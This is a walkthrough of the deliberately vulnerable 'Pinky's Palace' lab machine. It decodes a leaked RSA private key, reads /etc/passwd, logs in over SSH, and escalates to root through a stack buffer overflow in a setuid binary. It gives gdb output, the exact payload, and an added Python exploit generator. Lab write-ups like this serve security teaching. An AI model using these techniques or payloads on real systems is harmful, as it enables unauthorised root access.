dzBUVlIKMkNCN1BzRUNnWUVBOElXM1pzS3RiQ2tSQnRGK1ZUQnE0SzQ2czdTaFc5QVo2K2JwYitk
MU5SVDV4UkpHK0RzegpGM2NnNE4rMzluWWc4bUZ3c0Jobi9zemdWQk5XWm91V3JSTnJERXhIMHl1
NkhPSjd6TFdRYXlVaFFKaUlQeHBjCm4vRWVkNlNyY3lTZnpnbW50T2liNGh5R2pGMC93bnRqTWM3
M3h1QVZOdU84QTZXVytoZ1ZIS0VDZ1lFQTVZaVcKSzJ2YlZOQnFFQkNQK3hyQzVkSE9CSUVXdjg5
QkZJbS9Gcy9lc2g4dUU1TG5qMTFlUCsxRVpoMkZLOTJReDlZdgp5MWJNc0FrZitwdEZVSkxjazFN
MjBlZkFhU3ZPaHI1dWFqbnlxQ29mc1NVZktaYWE3blBRb3plcHFNS1hHTW95Ck1FRWVMT3c1NnNK
aFNwMFVkWHlhejlGUUFtdnpTWFVudW8xdCtnTUNnWUVBdWJ4NDJXa0NwU0M5WGtlT3lGaGcKWUdz
TE45VUlPaTlrcFJBbk9seEIzYUQ2RkY0OTRkbE5aaFIvbGtnTTlzMVlPZlJYSWhWbTBaUUNzOHBQ
RVZkQQpIeDE4ci8yRUJhV2h6a1p6bGF5ci9xR29vUXBwUkZtbUozajZyeWZCb21RbzUrSDYyVEE3
bUl1d3Qxb1hMNmM2Ci9hNjNGcVBhbmcyVkZqZmNjL3IrNnFFQ2dZQStBenJmSEZLemhXTkNWOWN1
ZGpwMXNNdENPRVlYS0QxaStSd2gKWTZPODUrT2c4aTJSZEI1RWt5dkprdXdwdjhDZjNPUW93Wmlu
YnErdkcwZ016c0M5Sk54SXRaNHNTK09PVCtDdwozbHNLeCthc0MyVng3UGlLdDh1RWJVTnZEck9Y
eFBqdVJJbU1oWDNZU1EvVUFzQkdSWlhsMDUwVUttb2VUSUtoClNoaU9WUUtCZ1FEc1M0MWltQ3hX
Mm1lNTQxdnR3QWFJcFE1bG81T1Z6RDJBOXRlRVBzVTZGMmg2WDdwV1I2SVgKQTlycExXbWJmeEdn
SjBNVmh4Q2pwZVlnU0M4VXNkTXpOYTJBcGN3T1dRZWtORTRlTHRPN1p2MlNWRHI2Y0lyYwpIY2NF
UCtNR00yZVVmQlBua2FQa2JDUHI3dG5xUGY4ZUpxaVFVa1dWaDJDbll6ZUFIcjVPbUE9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=


Next to the note is a hidden file holding a base64-encoded key. Decode it:


┌──(root㉿ru)-[~]
└─# echo "LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMTZmeEwzLyto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" | base64 -d
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----




pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
pinky:x:1000:1000:pinky,,,:/home/pinky:/bin/bash
mysql:x:106:111:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
pinkymanage:x:1001:1001:pinkymanage,,,:/home/pinkymanage:/bin/bash



pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat /etc/passwd | grep /bin/.*sh
root:x:0:0:root:/root:/bin/bash
pinky:x:1000:1000:pinky,,,:/home/pinky:/bin/bash
pinkymanage:x:1001:1001:pinkymanage,,,:/home/pinkymanage:/bin/bash


pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for pinkymanage:

sudo -l gets no further than the password prompt: pinkymanage has no sudo rights, so we need another route. The RSA key found under the web root is the next thing to try, against the other shell user, pinky.



Logging in as pinky
┌──(root㉿ru)-[~/kali]
└─# ssh -i pinky_key pinky@192.168.169.63 -p 64666
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'pinky_key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "pinky_key": bad permissions
pinky@192.168.169.63's password:


ssh refuses a private key file that other users can read. Restrict it to the owner (mode 600) and retry:

┌──(root㉿ru)-[~/kali]
└─# chmod 600 pinky_key

┌──(root㉿ru)-[~/kali]
└─# ssh -i pinky_key pinky@192.168.169.63 -p 64666
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb  2 05:54:01 2018 from 172.19.19.2
pinky@pinkys-palace:~$ id
uid=1000(pinky) gid=1000(pinky) groups=1000(pinky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
pinky@pinkys-palace:~$



pinky@pinkys-palace:~$ ls
adminhelper  note.txt
pinky@pinkys-palace:~$ cat note.txt
Been working on this program to help me when I need to do administrator tasks sudo is just too hard to configure and I can never remember my root password! Sadly I'm fairly new to C so I was working on my printing skills because Im not sure how to implement shell spawning yet :(
pinky@pinkys-palace:~$




According to the note, the program only prints. Let's test it:

pinky@pinkys-palace:~$ ./adminhelper admin
admin
pinky@pinkys-palace:~$ ./adminhelper root
root
pinky@pinkys-palace:~$


Indeed: it just echoes its argument.
Buffer overflow
The kind of vulnerability that gives me the biggest headache...

pinky@pinkys-palace:~$ ./adminhelper `python -c 'print "A"*200'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Segmentation fault: the argument is copied into a fixed-size stack buffer with no length check. What we need now is the exact distance from the start of that buffer to the saved return address.
The shell only reports the signal, not where the crash happened, so the author narrowed the offset down by trying different lengths (a cyclic pattern under gdb gives the same number in a single run).


pinky@pinkys-palace:~$ ./adminhelper `python -c 'print "A"*72'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Bus error

After a few different lengths, 72 turns out to be the size of the buffer: with exactly 72 bytes the crash changes character, because strcpy copies the 72 A's plus its NUL terminator and that single zero byte lands on the low byte of the saved return address. So the return address starts at byte 72. Next we need somewhere useful to send execution once adminhelper returns.


pinky@pinkys-palace:~$ gdb ./adminhelper
GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./adminhelper...(no debugging symbols found)...done.
(gdb) info functions
All defined functions:

Non-debugging symbols:
0x0000000000000618  _init
0x0000000000000640  strcpy@plt
0x0000000000000650  puts@plt
0x0000000000000660  execve@plt
0x0000000000000670  setegid@plt
0x0000000000000680  seteuid@plt
0x00000000000006a0  _start
0x00000000000006d0  deregister_tm_clones
0x0000000000000710  register_tm_clones
0x0000000000000760  __do_global_dtors_aux
0x00000000000007a0  frame_dummy
0x00000000000007d0  spawn
0x0000000000000813  main
0x0000000000000860  __libc_csu_init
0x00000000000008d0  __libc_csu_fini
0x00000000000008d4  _fini
(gdb)


Loading the program in gdb, info functions lists a spawn function beside main, and the imported PLT entries (seteuid, setegid, execve) say what it does: set the effective uid/gid and exec a shell. That is the function we want to redirect execution into.


(gdb) break main
Breakpoint 1 at 0x817
(gdb) run
Starting program: /home/pinky/adminhelper

Breakpoint 1, 0x0000555555554817 in main ()
(gdb) jump spawn
Continuing at 0x5555555547d4.
process 804 is executing new program: /bin/dash
Error in re-setting breakpoint 1: Function "main" not defined.
Jumping straight into spawn inside gdb proves the point: the process execs /bin/dash (the `$` prompt that follows is that shell). Next, confirm where the return address sits by running with 72 A's followed by six B's:

$ gdb --args ./adminhelper $(python -c "print 'A'*72+'B'*6")
GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./adminhelper...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/pinky/adminhelper AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()


To run spawn we trigger the stack overflow and overwrite the saved return address (this is a 64-bit binary, so the register that ends up holding it is RIP, not EIP).

With the payload    gdb --args ./adminhelper $(python -c "print 'A'*72+'B'*6")

the crash reports 0x0000424242424242: 0x42 is 'B', so the six bytes after 72 A's land exactly on the return address. Now we need the address to put there.

spawn is at offset 0x7d0 in the file (info functions), and under gdb the PIE is mapped at 0x555555554000 (the breakpoint set at main's 0x817 showed up at 0x555555554817), so the target is 0x00005555555547d0. Written little-endian, the low six bytes are \xd0\x47\x55\x55\x55\x55. Only six bytes are written because argv cannot carry a NUL and the two high bytes of a canonical user-space address are zero anyway: strcpy supplies the seventh as its terminator, and the eighth already held the zero high byte of the original return address into main.

So the payload is:      ./adminhelper $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55'")

That gives us a root shell and the flag. Two checks are worth doing before relying on this outside gdb: the address is only stable because ASLR is off on the box (cat /proc/sys/kernel/randomize_va_space should print 0), and the shell is only root because adminhelper is setuid root (ls -l adminhelper), which is what spawn's seteuid/setegid calls depend on.
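The offset hunt and the final payload, as an added example (not the write-up's own code): instead of guessing lengths, pass a cyclic pattern as argv[1], read the bytes that landed in the return slot from the crash (in gdb, the reported RIP as above, or x/gx $rsp when the ret faults on a non-canonical value), and look them up in the pattern. Since the binary is not available here, the crash bytes in the demo are taken from the pattern itself at position 72; cyclic, cyclic_find, pie_address and build_payload are names chosen for this example. It generalises the page's 72-byte case: any offset that fits in the pattern is found the same way.

```python
"""Offset discovery and payload construction for a strcpy() stack overflow."""
import itertools
import struct
import sys

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
WINDOW = 4  # every 4-byte window of the pattern is unique


def _de_bruijn(alphabet: bytes, n: int):
    """Lazily yield the de Bruijn sequence B(len(alphabet), n), byte by byte."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern: what to pass as argv[1] instead of 'A'*N."""
    return bytes(itertools.islice(_de_bruijn(ALPHABET, WINDOW), length))


def cyclic_find(crash_bytes: bytes, search_len: int = 1 << 16) -> int:
    """Offset in the pattern of the bytes that overwrote the return slot, or -1.

    The low four bytes are enough to identify the position; on x86-64 read them
    from the 8 bytes at $rsp when `ret` faults, or from RIP when the value was
    canonical and got loaded (as 0x0000424242424242 was in the gdb run above).
    """
    return cyclic(search_len).find(crash_bytes[:WINDOW])


def pie_address(load_base: int, file_offset: int) -> int:
    """Absolute address of a symbol in a PIE: spawn is 0x7d0 in the file, and
    gdb mapped the binary at 0x555555554000 (main's 0x817 became 0x555555554817)."""
    return load_base + file_offset


def build_payload(offset: int, target: int) -> bytes:
    """Padding up to the saved return address, then the target little-endian.

    Only six address bytes go in: argv cannot contain a NUL, the two high bytes
    of a canonical user-space address are zero anyway, strcpy() writes the
    seventh (its terminator), and the eighth already held the zero high byte of
    the original return address into main.
    """
    packed = struct.pack("<Q", target)
    if packed[6:] != b"\x00\x00":
        raise ValueError("target is not a canonical user-space address")
    payload = b"A" * offset + packed[:6]
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL; strcpy()/argv would truncate it")
    return payload


if __name__ == "__main__":
    # Hypothetical crash: in a real run these 8 bytes come from gdb after
    # ./adminhelper "$(python3 -c 'from exploit import cyclic; ...')";
    # here they are simply the pattern bytes at position 72.
    crash = cyclic(200)[72:80]
    offset = cyclic_find(crash)                      # 72
    spawn = pie_address(0x555555554000, 0x7D0)       # 0x5555555547d0
    sys.stdout.buffer.write(build_payload(offset, spawn))
```

On the target this would be used as ./adminhelper "$(python3 exploit.py)" (Python 3 on the box is an assumption; the page used Python 2's print, in which case generate the bytes on the attacking machine instead). The NUL check in build_payload is the reason the author's one-liner stops at six bytes rather than packing a full 8-byte address.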
